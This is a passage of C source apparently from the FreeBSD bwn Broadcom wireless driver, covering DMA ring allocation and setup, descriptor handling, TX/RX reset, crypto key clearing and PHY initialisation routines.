bus_dmamap_create(dma->rxbuf_dtag, 0, &dr->dr_spare_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto out; /* XXX wrong! */ } for (i = 0; i < dr->dr_numslots; i++) { dr->getdesc(dr, i, &desc, &mt); error = bus_dmamap_create(dma->rxbuf_dtag, 0, &mt->mt_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto out; /* XXX wrong! */ } error = bwn_dma_newbuf(dr, desc, mt, 1); if (error) { device_printf(sc->sc_dev, "failed to allocate RX buf\n"); goto out; /* XXX wrong! */ } } bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); dr->dr_usedslot = dr->dr_numslots; } out: return (dr); fail2: free(dr->dr_txhdr_cache, M_DEVBUF); fail1: free(dr->dr_meta, M_DEVBUF); fail0: free(dr, M_DEVBUF); return (NULL); } static void bwn_dma_ringfree(struct bwn_dma_ring **dr) { if (dr == NULL) return; bwn_dma_free_descbufs(*dr); bwn_dma_free_ringmemory(*dr); free((*dr)->dr_txhdr_cache, M_DEVBUF); free((*dr)->dr_meta, M_DEVBUF); free(*dr, M_DEVBUF); *dr = NULL; } static void bwn_dma_32_getdesc(struct bwn_dma_ring *dr, int slot, struct bwn_dmadesc_generic **gdesc, struct bwn_dmadesc_meta **meta) { struct bwn_dmadesc32 *desc; *meta = &(dr->dr_meta[slot]); desc = dr->dr_ring_descbase; desc = &(desc[slot]); *gdesc = (struct bwn_dmadesc_generic *)desc; } static void bwn_dma_32_setdesc(struct bwn_dma_ring *dr, struct bwn_dmadesc_generic *desc, bus_addr_t dmaaddr, uint16_t bufsize, int start, int end, int irq) { struct bwn_dmadesc32 *descbase = dr->dr_ring_descbase; struct bwn_softc *sc = dr->dr_mac->mac_sc; uint32_t addr, addrext, ctl; int slot; slot = (int)(&(desc->dma.dma32) - descbase); KASSERT(slot >= 0 && slot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); addr = (uint32_t) (dmaaddr & ~SIBA_DMA_TRANSLATION_MASK); addrext = (uint32_t) (dmaaddr & SIBA_DMA_TRANSLATION_MASK) >> 30; addr |= siba_dma_translation(sc->sc_dev); ctl = bufsize & BWN_DMA32_DCTL_BYTECNT; if (slot == dr->dr_numslots - 1) ctl |= BWN_DMA32_DCTL_DTABLEEND; if (start) ctl |= BWN_DMA32_DCTL_FRAMESTART; if (end) ctl |= BWN_DMA32_DCTL_FRAMEEND; if (irq) ctl |= BWN_DMA32_DCTL_IRQ; ctl |= (addrext << BWN_DMA32_DCTL_ADDREXT_SHIFT) & BWN_DMA32_DCTL_ADDREXT_MASK; desc->dma.dma32.control = htole32(ctl); desc->dma.dma32.address = htole32(addr); } static void bwn_dma_32_start_transfer(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA32_TXINDEX, (uint32_t)(slot * sizeof(struct bwn_dmadesc32))); } static void bwn_dma_32_suspend(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA32_TXCTL, BWN_DMA_READ(dr, BWN_DMA32_TXCTL) | BWN_DMA32_TXSUSPEND); } static void bwn_dma_32_resume(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA32_TXCTL, BWN_DMA_READ(dr, BWN_DMA32_TXCTL) & ~BWN_DMA32_TXSUSPEND); } static int bwn_dma_32_get_curslot(struct bwn_dma_ring *dr) { uint32_t val; val = BWN_DMA_READ(dr, BWN_DMA32_RXSTATUS); val &= BWN_DMA32_RXDPTR; return (val / sizeof(struct bwn_dmadesc32)); } static void bwn_dma_32_set_curslot(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA32_RXINDEX, (uint32_t) (slot * sizeof(struct bwn_dmadesc32))); } static void bwn_dma_64_getdesc(struct bwn_dma_ring *dr, int slot, struct bwn_dmadesc_generic **gdesc, struct bwn_dmadesc_meta **meta) { struct bwn_dmadesc64 *desc; *meta = &(dr->dr_meta[slot]); desc = dr->dr_ring_descbase; desc = &(desc[slot]); *gdesc = (struct bwn_dmadesc_generic *)desc; } static void bwn_dma_64_setdesc(struct bwn_dma_ring *dr, struct bwn_dmadesc_generic *desc, bus_addr_t dmaaddr, uint16_t bufsize, int start, int end, int irq) { struct bwn_dmadesc64 *descbase = dr->dr_ring_descbase; struct bwn_softc *sc = dr->dr_mac->mac_sc; int slot; uint32_t ctl0 = 0, ctl1 = 0; uint32_t addrlo, addrhi; uint32_t addrext; slot = (int)(&(desc->dma.dma64) - descbase); KASSERT(slot >= 0 && slot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); addrlo = (uint32_t) (dmaaddr & 0xffffffff); addrhi = (((uint64_t) dmaaddr >> 32) & ~SIBA_DMA_TRANSLATION_MASK); addrext = (((uint64_t) dmaaddr >> 32) & SIBA_DMA_TRANSLATION_MASK) >> 30; addrhi |= (siba_dma_translation(sc->sc_dev) << 1); if (slot == dr->dr_numslots - 1) ctl0 |= BWN_DMA64_DCTL0_DTABLEEND; if (start) ctl0 |= BWN_DMA64_DCTL0_FRAMESTART; if (end) ctl0 |= BWN_DMA64_DCTL0_FRAMEEND; if (irq) ctl0 |= BWN_DMA64_DCTL0_IRQ; ctl1 |= bufsize & BWN_DMA64_DCTL1_BYTECNT; ctl1 |= (addrext << BWN_DMA64_DCTL1_ADDREXT_SHIFT) & BWN_DMA64_DCTL1_ADDREXT_MASK; desc->dma.dma64.control0 = htole32(ctl0); desc->dma.dma64.control1 = htole32(ctl1); desc->dma.dma64.address_low = htole32(addrlo); desc->dma.dma64.address_high = htole32(addrhi); } static void bwn_dma_64_start_transfer(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA64_TXINDEX, (uint32_t)(slot * sizeof(struct bwn_dmadesc64))); } static void bwn_dma_64_suspend(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA64_TXCTL, BWN_DMA_READ(dr, BWN_DMA64_TXCTL) | BWN_DMA64_TXSUSPEND); } static void bwn_dma_64_resume(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA64_TXCTL, BWN_DMA_READ(dr, BWN_DMA64_TXCTL) & ~BWN_DMA64_TXSUSPEND); } static int bwn_dma_64_get_curslot(struct bwn_dma_ring *dr) { uint32_t val; val = BWN_DMA_READ(dr, BWN_DMA64_RXSTATUS); val &= BWN_DMA64_RXSTATDPTR; return (val / sizeof(struct bwn_dmadesc64)); } static void bwn_dma_64_set_curslot(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA64_RXINDEX, (uint32_t)(slot * sizeof(struct bwn_dmadesc64))); } static int bwn_dma_allocringmemory(struct bwn_dma_ring *dr) { struct bwn_mac *mac = dr->dr_mac; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_softc *sc = mac->mac_sc; int error; error = bus_dma_tag_create(dma->parent_dtag, BWN_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, BWN_DMA_RINGMEMSIZE, 1, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dr->dr_ring_dtag); if (error) { device_printf(sc->sc_dev, "can't create TX ring DMA tag: TODO frees\n"); return (-1); } error = bus_dmamem_alloc(dr->dr_ring_dtag, &dr->dr_ring_descbase, BUS_DMA_WAITOK | BUS_DMA_ZERO, &dr->dr_ring_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate DMA mem: TODO frees\n"); return (-1); } error = bus_dmamap_load(dr->dr_ring_dtag, dr->dr_ring_dmap, dr->dr_ring_descbase, BWN_DMA_RINGMEMSIZE, bwn_dma_ring_addr, &dr->dr_ring_dmabase, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load DMA mem: TODO free\n"); return (-1); } return (0); } static void bwn_dma_setup(struct bwn_dma_ring *dr) { struct bwn_softc *sc = dr->dr_mac->mac_sc; uint64_t ring64; uint32_t addrext, ring32, value; uint32_t trans = siba_dma_translation(sc->sc_dev); if (dr->dr_tx) { dr->dr_curslot = -1; if (dr->dr_type == BWN_DMA_64BIT) { ring64 = (uint64_t)(dr->dr_ring_dmabase); addrext = ((ring64 >> 32) & SIBA_DMA_TRANSLATION_MASK) >> 30; value = BWN_DMA64_TXENABLE; value |= (addrext << BWN_DMA64_TXADDREXT_SHIFT) & BWN_DMA64_TXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA64_TXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGLO, (ring64 & 0xffffffff)); BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGHI, ((ring64 >> 32) & ~SIBA_DMA_TRANSLATION_MASK) | (trans << 1)); } else { ring32 = (uint32_t)(dr->dr_ring_dmabase); addrext = (ring32 & SIBA_DMA_TRANSLATION_MASK) >> 30; value = BWN_DMA32_TXENABLE; value |= (addrext << BWN_DMA32_TXADDREXT_SHIFT) & BWN_DMA32_TXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA32_TXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA32_TXRING, (ring32 & ~SIBA_DMA_TRANSLATION_MASK) | trans); } return; } /* * set for RX */ dr->dr_usedslot = dr->dr_numslots; if (dr->dr_type == BWN_DMA_64BIT) { ring64 = (uint64_t)(dr->dr_ring_dmabase); addrext = ((ring64 >> 32) & SIBA_DMA_TRANSLATION_MASK) >> 30; value = (dr->dr_frameoffset << BWN_DMA64_RXFROFF_SHIFT); value |= BWN_DMA64_RXENABLE; value |= (addrext << BWN_DMA64_RXADDREXT_SHIFT) & BWN_DMA64_RXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA64_RXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGLO, (ring64 & 0xffffffff)); BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGHI, ((ring64 >> 32) & ~SIBA_DMA_TRANSLATION_MASK) | (trans << 1)); BWN_DMA_WRITE(dr, BWN_DMA64_RXINDEX, dr->dr_numslots * sizeof(struct bwn_dmadesc64)); } else { ring32 = (uint32_t)(dr->dr_ring_dmabase); addrext = (ring32 & SIBA_DMA_TRANSLATION_MASK) >> 30; value = (dr->dr_frameoffset << BWN_DMA32_RXFROFF_SHIFT); value |= BWN_DMA32_RXENABLE; value |= (addrext << BWN_DMA32_RXADDREXT_SHIFT) & BWN_DMA32_RXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA32_RXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA32_RXRING, (ring32 & ~SIBA_DMA_TRANSLATION_MASK) | trans); BWN_DMA_WRITE(dr, BWN_DMA32_RXINDEX, dr->dr_numslots * sizeof(struct bwn_dmadesc32)); } } static void bwn_dma_free_ringmemory(struct bwn_dma_ring *dr) { bus_dmamap_unload(dr->dr_ring_dtag, dr->dr_ring_dmap); bus_dmamem_free(dr->dr_ring_dtag, dr->dr_ring_descbase, dr->dr_ring_dmap); } static void bwn_dma_cleanup(struct bwn_dma_ring *dr) { if (dr->dr_tx) { bwn_dma_tx_reset(dr->dr_mac, dr->dr_base, dr->dr_type); if (dr->dr_type == BWN_DMA_64BIT) { BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGLO, 0); BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGHI, 0); } else BWN_DMA_WRITE(dr, BWN_DMA32_TXRING, 0); } else { bwn_dma_rx_reset(dr->dr_mac, dr->dr_base, dr->dr_type); if (dr->dr_type == BWN_DMA_64BIT) { BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGLO, 0); BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGHI, 0); } else BWN_DMA_WRITE(dr, BWN_DMA32_RXRING, 0); } } static void bwn_dma_free_descbufs(struct bwn_dma_ring *dr) { struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_mac *mac = dr->dr_mac; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_softc *sc = mac->mac_sc; int i; if (!dr->dr_usedslot) return; for (i = 0; i < dr->dr_numslots; i++) { dr->getdesc(dr, i, &desc, &meta); if (meta->mt_m == NULL) { if (!dr->dr_tx) device_printf(sc->sc_dev, "%s: not TX?\n", __func__); continue; } if (dr->dr_tx) { if (meta->mt_txtype == BWN_DMADESC_METATYPE_HEADER) bus_dmamap_unload(dr->dr_txring_dtag, meta->mt_dmap); else if (meta->mt_txtype == BWN_DMADESC_METATYPE_BODY) bus_dmamap_unload(dma->txbuf_dtag, meta->mt_dmap); } else bus_dmamap_unload(dma->rxbuf_dtag, meta->mt_dmap); bwn_dma_free_descbuf(dr, meta); } } static int bwn_dma_tx_reset(struct bwn_mac *mac, uint16_t base, int type) { struct bwn_softc *sc = mac->mac_sc; uint32_t value; int i; uint16_t offset; for (i = 0; i < 10; i++) { offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_TXSTATUS : BWN_DMA32_TXSTATUS; value = BWN_READ_4(mac, base + offset); if (type == BWN_DMA_64BIT) { value &= BWN_DMA64_TXSTAT; if (value == BWN_DMA64_TXSTAT_DISABLED || value == BWN_DMA64_TXSTAT_IDLEWAIT || value == BWN_DMA64_TXSTAT_STOPPED) break; } else { value &= BWN_DMA32_TXSTATE; if (value == BWN_DMA32_TXSTAT_DISABLED || value == BWN_DMA32_TXSTAT_IDLEWAIT || value == BWN_DMA32_TXSTAT_STOPPED) break; } DELAY(1000); } offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_TXCTL : BWN_DMA32_TXCTL; BWN_WRITE_4(mac, base + offset, 0); for (i = 0; i < 10; i++) { offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_TXSTATUS : BWN_DMA32_TXSTATUS; value = BWN_READ_4(mac, base + offset); if (type == BWN_DMA_64BIT) { value &= BWN_DMA64_TXSTAT; if (value == BWN_DMA64_TXSTAT_DISABLED) { i = -1; break; } } else { value &= BWN_DMA32_TXSTATE; if (value == BWN_DMA32_TXSTAT_DISABLED) { i = -1; break; } } DELAY(1000); } if (i != -1) { device_printf(sc->sc_dev, "%s: timed out\n", __func__); return (ENODEV); } DELAY(1000); return (0); } static int bwn_dma_rx_reset(struct bwn_mac *mac, uint16_t base, int type) { struct bwn_softc *sc = mac->mac_sc; uint32_t value; int i; uint16_t offset; offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_RXCTL : BWN_DMA32_RXCTL; BWN_WRITE_4(mac, base + offset, 0); for (i = 0; i < 10; i++) { offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_RXSTATUS : BWN_DMA32_RXSTATUS; value = BWN_READ_4(mac, base + offset); if (type == BWN_DMA_64BIT) { value &= BWN_DMA64_RXSTAT; if (value == BWN_DMA64_RXSTAT_DISABLED) { i = -1; break; } } else { value &= BWN_DMA32_RXSTATE; if (value == BWN_DMA32_RXSTAT_DISABLED) { i = -1; break; } } DELAY(1000); } if (i != -1) { device_printf(sc->sc_dev, "%s: timed out\n", __func__); return (ENODEV); } return (0); } static void bwn_dma_free_descbuf(struct bwn_dma_ring *dr, struct bwn_dmadesc_meta *meta) { if (meta->mt_m != NULL) { m_freem(meta->mt_m); meta->mt_m = NULL; } if (meta->mt_ni != NULL) { ieee80211_free_node(meta->mt_ni); meta->mt_ni = NULL; } } static void bwn_dma_set_redzone(struct bwn_dma_ring *dr, struct mbuf *m) { struct bwn_rxhdr4 *rxhdr; unsigned char *frame; rxhdr = mtod(m, struct bwn_rxhdr4 *); rxhdr->frame_len = 0; KASSERT(dr->dr_rx_bufsize >= dr->dr_frameoffset + sizeof(struct bwn_plcp6) + 2, ("%s:%d: fail", __func__, __LINE__)); frame = mtod(m, char *) + dr->dr_frameoffset; memset(frame, 0xff, sizeof(struct bwn_plcp6) + 2 /* padding */); } static uint8_t bwn_dma_check_redzone(struct bwn_dma_ring *dr, struct mbuf *m) { unsigned char *f = mtod(m, char *) + dr->dr_frameoffset; return ((f[0] & f[1] & f[2] & f[3] & f[4] & f[5] & f[6] & f[7]) == 0xff); } static void bwn_wme_init(struct bwn_mac *mac) { bwn_wme_load(mac); /* enable WME support. */ bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_EDCF); BWN_WRITE_2(mac, BWN_IFSCTL, BWN_READ_2(mac, BWN_IFSCTL) | BWN_IFSCTL_USE_EDCF); } static void bwn_spu_setdelay(struct bwn_mac *mac, int idle) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint16_t delay; /* microsec */ delay = (mac->mac_phy.type == BWN_PHYTYPE_A) ? 3700 : 1050; if (ic->ic_opmode == IEEE80211_M_IBSS || idle) delay = 500; if ((mac->mac_phy.rf_ver == 0x2050) && (mac->mac_phy.rf_rev == 8)) delay = max(delay, (uint16_t)2400); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_SPU_WAKEUP, delay); } static void bwn_bt_enable(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint64_t hf; if (bwn_bluetooth == 0) return; if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_BTCOEXIST) == 0) return; if (mac->mac_phy.type != BWN_PHYTYPE_B && !mac->mac_phy.gmode) return; hf = bwn_hf_read(mac); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_BTCMOD) hf |= BWN_HF_BT_COEXISTALT; else hf |= BWN_HF_BT_COEXIST; bwn_hf_write(mac, hf); } static void bwn_set_macaddr(struct bwn_mac *mac) { bwn_mac_write_bssid(mac); bwn_mac_setfilter(mac, BWN_MACFILTER_SELF, mac->mac_sc->sc_macaddr); } static void bwn_clear_keys(struct bwn_mac *mac) { int i; for (i = 0; i < mac->mac_max_nr_keys; i++) { KASSERT(i >= 0 && i < mac->mac_max_nr_keys, ("%s:%d: fail", __func__, __LINE__)); bwn_key_dowrite(mac, i, BWN_SEC_ALGO_NONE, NULL, BWN_SEC_KEYSIZE, NULL); if ((i <= 3) && !BWN_SEC_NEWAPI(mac)) { bwn_key_dowrite(mac, i + 4, BWN_SEC_ALGO_NONE, NULL, BWN_SEC_KEYSIZE, NULL); } mac->mac_key[i].keyconf = NULL; } } static void bwn_crypt_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; mac->mac_max_nr_keys = (siba_get_revid(sc->sc_dev) >= 5) ? 58 : 20; KASSERT(mac->mac_max_nr_keys <= N(mac->mac_key), ("%s:%d: fail", __func__, __LINE__)); mac->mac_ktp = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_KEY_TABLEP); mac->mac_ktp *= 2; if (siba_get_revid(sc->sc_dev) >= 5) BWN_WRITE_2(mac, BWN_RCMTA_COUNT, mac->mac_max_nr_keys - 8); bwn_clear_keys(mac); } static void bwn_chip_exit(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; bwn_phy_exit(mac); siba_gpio_set(sc->sc_dev, 0); } static int bwn_fw_fillinfo(struct bwn_mac *mac) { int error; error = bwn_fw_gets(mac, BWN_FWTYPE_DEFAULT); if (error == 0) return (0); error = bwn_fw_gets(mac, BWN_FWTYPE_OPENSOURCE); if (error == 0) return (0); return (error); } static int bwn_gpio_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t mask = 0x1f, set = 0xf, value; BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_GPOUT_MASK); BWN_WRITE_2(mac, BWN_GPIO_MASK, BWN_READ_2(mac, BWN_GPIO_MASK) | 0x000f); if (siba_get_chipid(sc->sc_dev) == 0x4301) { mask |= 0x0060; set |= 0x0060; } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) { BWN_WRITE_2(mac, BWN_GPIO_MASK, BWN_READ_2(mac, BWN_GPIO_MASK) | 0x0200); mask |= 0x0200; set |= 0x0200; } if (siba_get_revid(sc->sc_dev) >= 2) mask |= 0x0010; value = siba_gpio_get(sc->sc_dev); if (value == -1) return (0); siba_gpio_set(sc->sc_dev, (value & mask) | set); return (0); } static int bwn_fw_loadinitvals(struct bwn_mac *mac) { #define GETFWOFFSET(fwp, offset) \ ((const struct bwn_fwinitvals *)((const char *)fwp.fw->data + offset)) const size_t hdr_len = sizeof(struct bwn_fwhdr); const struct bwn_fwhdr *hdr; struct bwn_fw *fw = &mac->mac_fw; int error; hdr = (const struct bwn_fwhdr *)(fw->initvals.fw->data); error = bwn_fwinitvals_write(mac, GETFWOFFSET(fw->initvals, hdr_len), be32toh(hdr->size), fw->initvals.fw->datasize - hdr_len); if (error) return (error); if (fw->initvals_band.fw) { hdr = (const struct bwn_fwhdr *)(fw->initvals_band.fw->data); error = bwn_fwinitvals_write(mac, GETFWOFFSET(fw->initvals_band, hdr_len), be32toh(hdr->size), fw->initvals_band.fw->datasize - hdr_len); } return (error); #undef GETFWOFFSET } static int bwn_phy_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int error; mac->mac_phy.chan = mac->mac_phy.get_default_chan(mac); mac->mac_phy.rf_onoff(mac, 1); error = mac->mac_phy.init(mac); if (error) { device_printf(sc->sc_dev, "PHY init failed\n"); goto fail0; } error = bwn_switch_channel(mac, mac->mac_phy.get_default_chan(mac)); if (error) { device_printf(sc->sc_dev, "failed to switch default channel\n"); goto fail1; } return (0); fail1: if (mac->mac_phy.exit) mac->mac_phy.exit(mac); fail0: mac->mac_phy.rf_onoff(mac, 0); return (error); } static void bwn_set_txantenna(struct bwn_mac *mac, int antenna) { uint16_t ant; uint16_t tmp; ant = bwn_ant2phy(antenna); /* For ACK/CTS */ tmp = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_ACKCTS_PHYCTL); tmp = (tmp & ~BWN_TX_PHY_ANT) | ant; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_ACKCTS_PHYCTL, tmp); /* For Probe Resposes */ tmp = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_PHYCTL); tmp = (tmp & ~BWN_TX_PHY_ANT) | ant; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_PHYCTL, tmp); } static void bwn_set_opmode(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t ctl; uint16_t cfp_pretbtt; ctl = BWN_READ_4(mac, BWN_MACCTL); ctl &= ~(BWN_MACCTL_HOSTAP | BWN_MACCTL_PASS_CTL | BWN_MACCTL_PASS_BADPLCP | BWN_MACCTL_PASS_BADFCS | BWN_MACCTL_PROMISC | BWN_MACCTL_BEACON_PROMISC); ctl |= BWN_MACCTL_STA; if (ic->ic_opmode == IEEE80211_M_HOSTAP || ic->ic_opmode == IEEE80211_M_MBSS) ctl |= BWN_MACCTL_HOSTAP; else if (ic->ic_opmode == IEEE80211_M_IBSS) ctl &= ~BWN_MACCTL_STA; ctl |= sc->sc_filters; if (siba_get_revid(sc->sc_dev) <= 4) ctl |= BWN_MACCTL_PROMISC; BWN_WRITE_4(mac, BWN_MACCTL, ctl); cfp_pretbtt = 2; if ((ctl & BWN_MACCTL_STA) && !(ctl & BWN_MACCTL_HOSTAP)) { if (siba_get_chipid(sc->sc_dev) == 0x4306 && siba_get_chiprev(sc->sc_dev) == 3) cfp_pretbtt = 100; else cfp_pretbtt = 50; } BWN_WRITE_2(mac, 0x612, cfp_pretbtt); } static int bwn_dma_gettype(struct bwn_mac *mac) { uint32_t tmp; uint16_t base; tmp = BWN_READ_4(mac, SIBA_TGSHIGH); if (tmp & SIBA_TGSHIGH_DMA64) return (BWN_DMA_64BIT); base = bwn_dma_base(0, 0); BWN_WRITE_4(mac, base + BWN_DMA32_TXCTL, BWN_DMA32_TXADDREXT_MASK); tmp = BWN_READ_4(mac, base + BWN_DMA32_TXCTL); if (tmp & BWN_DMA32_TXADDREXT_MASK) return (BWN_DMA_32BIT); return (BWN_DMA_30BIT); } static void bwn_dma_ring_addr(void *arg, bus_dma_segment_t *seg, int nseg, int error) { if (!error) { KASSERT(nseg == 1, ("too many segments(%d)\n", nseg)); *((bus_addr_t *)arg) = seg->ds_addr; } } static void bwn_phy_g_init_sub(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t i, tmp; if (phy->rev == 1) bwn_phy_init_b5(mac); else bwn_phy_init_b6(mac); if (phy->rev >= 2 || phy->gmode) bwn_phy_init_a(mac); if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, 0); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, 0); } if (phy->rev == 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xc0); } if (phy->rev > 5) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0x400); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xc0); } if (phy->gmode || phy->rev >= 2) { tmp = BWN_PHY_READ(mac, BWN_PHY_VERSION_OFDM); tmp &= BWN_PHYVER_VERSION; if (tmp == 3 || tmp == 5) { BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc2), 0x1816); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc3), 0x8006); } if (tmp == 5) { BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xcc), 0x00ff, 0x1f00); } } if ((phy->rev <= 2 && phy->gmode) || phy->rev >= 2) BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x7e), 0x78); if (phy->rf_rev == 8) { BWN_PHY_SET(mac, BWN_PHY_EXTG(0x01), 0x80); BWN_PHY_SET(mac, BWN_PHY_OFDM(0x3e), 0x4); } if (BWN_HAS_LOOPBACK(phy)) bwn_loopback_calcgain(mac); if (phy->rf_rev != 8) { if (pg->pg_initval == 0xffff) pg->pg_initval = bwn_rf_init_bcm2050(mac); else BWN_RF_WRITE(mac, 0x0078, pg->pg_initval); } bwn_lo_g_init(mac); if (BWN_HAS_TXMAG(phy)) { BWN_RF_WRITE(mac, 0x52, (BWN_RF_READ(mac, 0x52) & 0xff00) | pg->pg_loctl.tx_bias | pg->pg_loctl.tx_magn); } else { BWN_RF_SETMASK(mac, 0x52, 0xfff0, pg->pg_loctl.tx_bias); } if (phy->rev >= 6) { BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x36), 0x0fff, (pg->pg_loctl.tx_bias << 12)); } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x8075); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x807f); if (phy->rev < 2) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x101); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x202); if (phy->gmode || phy->rev >= 2) { bwn_lo_g_adjust(mac); BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8078); } if (!(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_RSSI)) { for (i = 0; i < 64; i++) { BWN_PHY_WRITE(mac, BWN_PHY_NRSSI_CTRL, i); BWN_PHY_WRITE(mac, BWN_PHY_NRSSI_DATA, (uint16_t)MIN(MAX(bwn_nrssi_read(mac, i) - 0xffff, -32), 31)); } bwn_nrssi_threshold(mac); } else if (phy->gmode || phy->rev >= 2) { if (pg->pg_nrssi[0] == -1000) { KASSERT(pg->pg_nrssi[1] == -1000, ("%s:%d: fail", __func__, __LINE__)); bwn_nrssi_slope_11g(mac); } else bwn_nrssi_threshold(mac); } if (phy->rf_rev == 8) BWN_PHY_WRITE(mac, BWN_PHY_EXTG(0x05), 0x3230); bwn_phy_hwpctl_init(mac); if ((siba_get_chipid(sc->sc_dev) == 0x4306 && siba_get_chippkg(sc->sc_dev) == 2) || 0) { BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0xbfff); BWN_PHY_MASK(mac, BWN_PHY_OFDM(0xc3), 0x7fff); } } static uint8_t bwn_has_hwpctl(struct bwn_mac *mac) { if (mac->mac_phy.hwpctl == 0 || mac->mac_phy.use_hwpctl == NULL) return (0); return (mac->mac_phy.use_hwpctl(mac)); } static void bwn_phy_init_b5(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t offset, value; uint8_t old_channel; if (phy->analog == 1) BWN_RF_SET(mac, 0x007a, 0x0050); if ((siba_get_pci_subvendor(sc->sc_dev) != SIBA_BOARDVENDOR_BCM) && (siba_get_pci_subdevice(sc->sc_dev) != SIBA_BOARD_BU4306)) { value = 0x2120; for (offset = 0x00a8; offset < 0x00c7; offset++) { BWN_PHY_WRITE(mac, offset, value); value += 0x202; } } BWN_PHY_SETMASK(mac, 0x0035, 0xf0ff, 0x0700); if (phy->rf_ver == 0x2050) BWN_PHY_WRITE(mac, 0x0038, 0x0667); if (phy->gmode || phy->rev >= 2) { if (phy->rf_ver == 0x2050) { BWN_RF_SET(mac, 0x007a, 0x0020); BWN_RF_SET(mac, 0x0051, 0x0004); } BWN_WRITE_2(mac, BWN_PHY_RADIO, 0x0000); BWN_PHY_SET(mac, 0x0802, 0x0100); BWN_PHY_SET(mac, 0x042b, 0x2000); BWN_PHY_WRITE(mac, 0x001c, 0x186a); BWN_PHY_SETMASK(mac, 0x0013, 0x00ff, 0x1900); BWN_PHY_SETMASK(mac, 